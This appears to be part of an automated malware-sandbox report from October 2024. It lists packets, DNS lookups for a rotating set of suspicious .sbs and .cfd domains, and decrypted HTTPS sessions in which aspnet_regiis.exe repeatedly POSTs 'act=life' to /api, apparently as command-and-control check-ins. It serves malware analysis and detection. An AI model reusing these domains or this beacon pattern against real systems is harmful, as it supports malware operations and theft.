Oct 14, 2024 05:01:07.886039972 CEST	49736	443	192.168.2.4	172.67.141.136
Oct 14, 2024 05:01:07.886063099 CEST	443	49736	172.67.141.136	192.168.2.4
Oct 14, 2024 05:01:07.921653986 CEST	49737	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:07.921746016 CEST	443	49737	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:07.921855927 CEST	49737	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:07.934273958 CEST	49737	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:07.934385061 CEST	443	49737	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:08.433384895 CEST	443	49737	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:08.433757067 CEST	49737	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:08.435924053 CEST	49737	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:08.435976982 CEST	443	49737	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:08.436491013 CEST	443	49737	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:08.437886000 CEST	49737	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:08.437933922 CEST	49737	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:08.438031912 CEST	443	49737	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:08.867278099 CEST	443	49737	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:08.867602110 CEST	443	49737	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:08.867830992 CEST	49737	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:08.867830992 CEST	49737	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:08.867924929 CEST	49737	443	192.168.2.4	188.114.96.3
Oct 14, 2024 05:01:08.867969036 CEST	443	49737	188.114.96.3	192.168.2.4
Oct 14, 2024 05:01:08.888263941 CEST	49738	443	192.168.2.4	104.102.49.254
Oct 14, 2024 05:01:08.888361931 CEST	443	49738	104.102.49.254	192.168.2.4
Oct 14, 2024 05:01:08.888474941 CEST	49738	443	192.168.2.4	104.102.49.254
Oct 14, 2024 05:01:08.889017105 CEST	49738	443	192.168.2.4	104.102.49.254
Oct 14, 2024 05:01:08.889096975 CEST	443	49738	104.102.49.254	192.168.2.4
Oct 14, 2024 05:01:09.616211891 CEST	443	49738	104.102.49.254	192.168.2.4
Oct 14, 2024 05:01:09.616439104 CEST	49738	443	192.168.2.4	104.102.49.254
Oct 14, 2024 05:01:09.618679047 CEST	49738	443	192.168.2.4	104.102.49.254
Oct 14, 2024 05:01:09.618716002 CEST	443	49738	104.102.49.254	192.168.2.4
Oct 14, 2024 05:01:09.619225025 CEST	443	49738	104.102.49.254	192.168.2.4
Oct 14, 2024 05:01:09.621045113 CEST	49738	443	192.168.2.4	104.102.49.254
Oct 14, 2024 05:01:09.667408943 CEST	443	49738	104.102.49.254	192.168.2.4
Oct 14, 2024 05:01:10.165508032 CEST	443	49738	104.102.49.254	192.168.2.4
Oct 14, 2024 05:01:10.165540934 CEST	443	49738	104.102.49.254	192.168.2.4
Oct 14, 2024 05:01:10.165635109 CEST	49738	443	192.168.2.4	104.102.49.254
Oct 14, 2024 05:01:10.165636063 CEST	49738	443	192.168.2.4	104.102.49.254
Oct 14, 2024 05:01:10.165704012 CEST	443	49738	104.102.49.254	192.168.2.4
Oct 14, 2024 05:01:10.165771961 CEST	443	49738	104.102.49.254	192.168.2.4
Oct 14, 2024 05:01:10.165821075 CEST	49738	443	192.168.2.4	104.102.49.254
Oct 14, 2024 05:01:10.165844917 CEST	49738	443	192.168.2.4	104.102.49.254
Oct 14, 2024 05:01:10.297029018 CEST	443	49738	104.102.49.254	192.168.2.4
Oct 14, 2024 05:01:10.297058105 CEST	443	49738	104.102.49.254	192.168.2.4
Oct 14, 2024 05:01:10.297348022 CEST	49738	443	192.168.2.4	104.102.49.254
Oct 14, 2024 05:01:10.297379017 CEST	443	49738	104.102.49.254	192.168.2.4
Oct 14, 2024 05:01:10.297813892 CEST	49738	443	192.168.2.4	104.102.49.254
Oct 14, 2024 05:01:10.303484917 CEST	443	49738	104.102.49.254	192.168.2.4
Oct 14, 2024 05:01:10.303601027 CEST	443	49738	104.102.49.254	192.168.2.4
Oct 14, 2024 05:01:10.303738117 CEST	49738	443	192.168.2.4	104.102.49.254
Oct 14, 2024 05:01:10.303739071 CEST	49738	443	192.168.2.4	104.102.49.254
Oct 14, 2024 05:01:10.303934097 CEST	49738	443	192.168.2.4	104.102.49.254
Oct 14, 2024 05:01:10.303934097 CEST	49738	443	192.168.2.4	104.102.49.254
Oct 14, 2024 05:01:10.303981066 CEST	443	49738	104.102.49.254	192.168.2.4
Oct 14, 2024 05:01:10.304008961 CEST	443	49738	104.102.49.254	192.168.2.4
Oct 14, 2024 05:01:10.467381954 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:10.467521906 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:10.467617035 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:10.468162060 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:10.468234062 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.010042906 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.010260105 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:11.141486883 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:11.141571999 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.142704964 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.144808054 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:11.144808054 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:11.145263910 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.254239082 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.254368067 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.254460096 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.254543066 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.254566908 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:11.254641056 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.254682064 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:11.254776001 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.254853010 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:11.295228958 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:11.295229912 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:11.295301914 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.295336962 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.481199026 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:11.481297970 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.481426954 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:11.481786966 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:11.481847048 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.985675097 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.985975027 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:11.988033056 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:11.988085032 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.988610983 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:11.989753962 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:11.989753962 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:11.989928007 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:12.869415045 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:12.869883060 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:12.870233059 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:12.870337963 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:12.870337963 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 14, 2024 05:01:12.870383978 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 14, 2024 05:01:12.870417118 CEST	443	49740	104.21.53.8	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 05:01:00.933569908 CEST	60296	53	192.168.2.4	1.1.1.1
Oct 14, 2024 05:01:00.947138071 CEST	53	60296	1.1.1.1	192.168.2.4
Oct 14, 2024 05:01:01.983944893 CEST	58982	53	192.168.2.4	1.1.1.1
Oct 14, 2024 05:01:01.997823000 CEST	53	58982	1.1.1.1	192.168.2.4
Oct 14, 2024 05:01:02.992424011 CEST	51466	53	192.168.2.4	1.1.1.1
Oct 14, 2024 05:01:03.001410961 CEST	53	51466	1.1.1.1	192.168.2.4
Oct 14, 2024 05:01:03.030095100 CEST	61779	53	192.168.2.4	1.1.1.1
Oct 14, 2024 05:01:03.042893887 CEST	53	61779	1.1.1.1	192.168.2.4
Oct 14, 2024 05:01:03.965677023 CEST	63820	53	192.168.2.4	1.1.1.1
Oct 14, 2024 05:01:03.977453947 CEST	53	63820	1.1.1.1	192.168.2.4
Oct 14, 2024 05:01:04.964185953 CEST	60410	53	192.168.2.4	1.1.1.1
Oct 14, 2024 05:01:04.978408098 CEST	53	60410	1.1.1.1	192.168.2.4
Oct 14, 2024 05:01:06.027034998 CEST	51139	53	192.168.2.4	1.1.1.1
Oct 14, 2024 05:01:06.039587021 CEST	53	51139	1.1.1.1	192.168.2.4
Oct 14, 2024 05:01:06.988332033 CEST	55368	53	192.168.2.4	1.1.1.1
Oct 14, 2024 05:01:07.000262022 CEST	53	55368	1.1.1.1	192.168.2.4
Oct 14, 2024 05:01:07.888189077 CEST	49533	53	192.168.2.4	1.1.1.1
Oct 14, 2024 05:01:07.901117086 CEST	53	49533	1.1.1.1	192.168.2.4
Oct 14, 2024 05:01:08.880698919 CEST	51228	53	192.168.2.4	1.1.1.1
Oct 14, 2024 05:01:08.887504101 CEST	53	51228	1.1.1.1	192.168.2.4
Oct 14, 2024 05:01:10.305464983 CEST	53423	53	192.168.2.4	1.1.1.1
Oct 14, 2024 05:01:10.466274023 CEST	53	53423	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 14, 2024 05:01:00.933569908 CEST	192.168.2.4	1.1.1.1	0xe1c4	Standard query (0)	passimovrt.cfd	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:01.983944893 CEST	192.168.2.4	1.1.1.1	0x1395	Standard query (0)	mathcucom.sbs	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:02.992424011 CEST	192.168.2.4	1.1.1.1	0xfad2	Standard query (0)	allocatinow.sbs	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:03.030095100 CEST	192.168.2.4	1.1.1.1	0x9542	Standard query (0)	enlargkiw.sbs	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:03.965677023 CEST	192.168.2.4	1.1.1.1	0x4847	Standard query (0)	resinedyw.sbs	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:04.964185953 CEST	192.168.2.4	1.1.1.1	0x385	Standard query (0)	vennurviot.sbs	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:06.027034998 CEST	192.168.2.4	1.1.1.1	0xfc47	Standard query (0)	ehticsprocw.sbs	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:06.988332033 CEST	192.168.2.4	1.1.1.1	0x9137	Standard query (0)	condifendteu.sbs	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:07.888189077 CEST	192.168.2.4	1.1.1.1	0x2908	Standard query (0)	drawwyobstacw.sbs	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:08.880698919 CEST	192.168.2.4	1.1.1.1	0xe2ef	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:10.305464983 CEST	192.168.2.4	1.1.1.1	0xf327	Standard query (0)	sergei-esenin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 14, 2024 05:01:00.947138071 CEST	1.1.1.1	192.168.2.4	0xe1c4	No error (0)	passimovrt.cfd		104.21.28.222	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:00.947138071 CEST	1.1.1.1	192.168.2.4	0xe1c4	No error (0)	passimovrt.cfd		172.67.147.188	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:01.997823000 CEST	1.1.1.1	192.168.2.4	0x1395	No error (0)	mathcucom.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:01.997823000 CEST	1.1.1.1	192.168.2.4	0x1395	No error (0)	mathcucom.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:03.001410961 CEST	1.1.1.1	192.168.2.4	0xfad2	Name error (3)	allocatinow.sbs	none	none	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:03.042893887 CEST	1.1.1.1	192.168.2.4	0x9542	No error (0)	enlargkiw.sbs		172.67.152.13	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:03.042893887 CEST	1.1.1.1	192.168.2.4	0x9542	No error (0)	enlargkiw.sbs		104.21.33.249	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:03.977453947 CEST	1.1.1.1	192.168.2.4	0x4847	No error (0)	resinedyw.sbs		172.67.205.156	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:03.977453947 CEST	1.1.1.1	192.168.2.4	0x4847	No error (0)	resinedyw.sbs		104.21.77.78	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:04.978408098 CEST	1.1.1.1	192.168.2.4	0x385	No error (0)	vennurviot.sbs		104.21.46.170	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:04.978408098 CEST	1.1.1.1	192.168.2.4	0x385	No error (0)	vennurviot.sbs		172.67.140.193	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:06.039587021 CEST	1.1.1.1	192.168.2.4	0xfc47	No error (0)	ehticsprocw.sbs		104.21.30.221	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:06.039587021 CEST	1.1.1.1	192.168.2.4	0xfc47	No error (0)	ehticsprocw.sbs		172.67.173.224	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:07.000262022 CEST	1.1.1.1	192.168.2.4	0x9137	No error (0)	condifendteu.sbs		172.67.141.136	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:07.000262022 CEST	1.1.1.1	192.168.2.4	0x9137	No error (0)	condifendteu.sbs		104.21.79.35	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:07.901117086 CEST	1.1.1.1	192.168.2.4	0x2908	No error (0)	drawwyobstacw.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:07.901117086 CEST	1.1.1.1	192.168.2.4	0x2908	No error (0)	drawwyobstacw.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:08.887504101 CEST	1.1.1.1	192.168.2.4	0xe2ef	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:10.466274023 CEST	1.1.1.1	192.168.2.4	0xf327	No error (0)	sergei-esenin.com		104.21.53.8	A (IP address)	IN (0x0001)	false
Oct 14, 2024 05:01:10.466274023 CEST	1.1.1.1	192.168.2.4	0xf327	No error (0)	sergei-esenin.com		172.67.206.204	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

passimovrt.cfd

mathcucom.sbs

enlargkiw.sbs

resinedyw.sbs

vennurviot.sbs

ehticsprocw.sbs

condifendteu.sbs

drawwyobstacw.sbs

steamcommunity.com

sergei-esenin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.28.222	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 03:01:01 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: passimovrt.cfd
2024-10-14 03:01:01 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-14 03:01:01 UTC	827	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 03:01:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9u0qp4od9oo0fsj88504mr4igg; expires=Thu, 06 Feb 2025 20:47:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r5KqwKz7xhoXXtIdbLFOyTt%2FUoOX1HI3YTgn8AzHSg7f3Y9G40%2BN4Kx%2FGckPs7lKekhOaILOMpoyLXjI5SJr6%2BdlO5iuvz7%2FEHULiRE98CQ6GNMryGtxcTNOawyjEnsRLA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d24528ced05c341-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 03:01:01 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 03:01:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	188.114.96.3	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 03:01:02 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mathcucom.sbs
2024-10-14 03:01:02 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-14 03:01:02 UTC	817	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 03:01:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=95d2pfud9k1f0da97epsksr0h9; expires=Thu, 06 Feb 2025 20:47:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9UrlddkwqSmcZpXxi7mPXPx5xliU%2FU2kKXWIq2JicOVMzmqr8ypxNdLXY7VOd8fM0SDt9wt53fYvO3NPXdquUnm00crb8ghCoEwbE%2FXZEVry8YJ%2FHEdZVm2Y5iF7SB%2Fl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d24529318228cc3-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 03:01:02 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 03:01:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	172.67.152.13	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 03:01:03 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: enlargkiw.sbs
2024-10-14 03:01:03 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-14 03:01:03 UTC	823	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 03:01:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=33nu5usg8mj27ndfuinpsqhu58; expires=Thu, 06 Feb 2025 20:47:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CfN7%2BUV68moyr%2F%2FQjZ4jGxhBBnOCdnzFpZYvxQ00dAlgQNNryKIfd24qWZxZh%2BeawZfoVr2aTzlL3hTKVhHAYFJnFBJGpt%2F7B7oOiui%2BCzGPIf7qMkWCz6BE%2BN6ow321"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d2452997ab70f49-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 03:01:03 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 03:01:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	172.67.205.156	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 03:01:04 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: resinedyw.sbs
2024-10-14 03:01:04 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-14 03:01:04 UTC	813	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 03:01:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m9uggeuln1bpi8j2uucg2mlt8n; expires=Thu, 06 Feb 2025 20:47:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hcIgb8kKKJIGsgxyEIvBUja3HdY3EAyr8XI8XVLGJJnii7LgSh2DJAGtUNJt9w45Agvtliv7Nz1ClkOYYWB4VbUTcEK2Bb3oV%2FRtHRn6cKEubF0NqIe8z5X%2B1iLnnobV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d24529f58ed42fb-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 03:01:04 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 03:01:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	104.21.46.170	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 03:01:05 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: vennurviot.sbs
2024-10-14 03:01:05 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-14 03:01:06 UTC	829	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 03:01:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cjdtuue08ao4vbqt83m560o4cj; expires=Thu, 06 Feb 2025 20:47:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FN5sTV%2BJ9MrmXjNaQNzR%2B%2FLCXJg4yqKLwv9CCIu7x9DV29tGQ6edQTMKEzP%2F4dYOYv88vL3aUy%2FIGB7TVMa1jfOtapfVzlvxIzHJUi0E385urbOpBNSt8dKLllZuHQJvsA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d2452a63b3b1906-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 03:01:06 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 03:01:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	104.21.30.221	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 03:01:06 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ehticsprocw.sbs
2024-10-14 03:01:06 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-14 03:01:06 UTC	815	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 03:01:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e4ltsu2umv1shds21omj8du9ee; expires=Thu, 06 Feb 2025 20:47:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PmPc17ngazDVJZ0j78Ka1zaV2VkMrayoh1JalydTlDaCP8pG4qJz2wzApTbysYHtABWaD7OOSDDQCmi90VGgtB9euq4A5OKYvwUPlhQ4xRkt62YVIhsxDzW6oPCaKnxBghU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d2452ac6b65c359-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 03:01:06 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 03:01:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	172.67.141.136	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 03:01:07 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: condifendteu.sbs
2024-10-14 03:01:07 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
